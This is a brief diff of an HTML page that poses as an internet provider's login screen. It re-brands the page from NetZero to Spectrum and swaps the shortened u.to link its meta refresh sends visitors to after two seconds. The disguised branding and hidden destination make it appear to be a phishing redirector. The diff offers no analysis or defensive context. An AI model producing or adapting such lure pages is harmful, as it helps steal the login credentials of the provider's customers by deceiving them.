--- a/1eaA.html
+++ b/1eaA.html
@@ -2,11 +2,11 @@
 <html>
 <head>
 <title>Redirecting...</title>
-<meta http-equiv="refresh" content="2; url = https://u.to/YXZKIg" />
+<meta http-equiv="refresh" content="2; url = https://u.to/PElDIg" />
 </head>
-<P>NetZero LOGIN
+<P>SPECTRUM LOGIN
 <body>
 <img src="">
-<p>NetZero LOGIN. PLEASE WAIT... Redirecting...</p>
+<p>SPECTRUM LOGIN. PLEASE WAIT... Redirecting...</p>
 </body>
 </html>
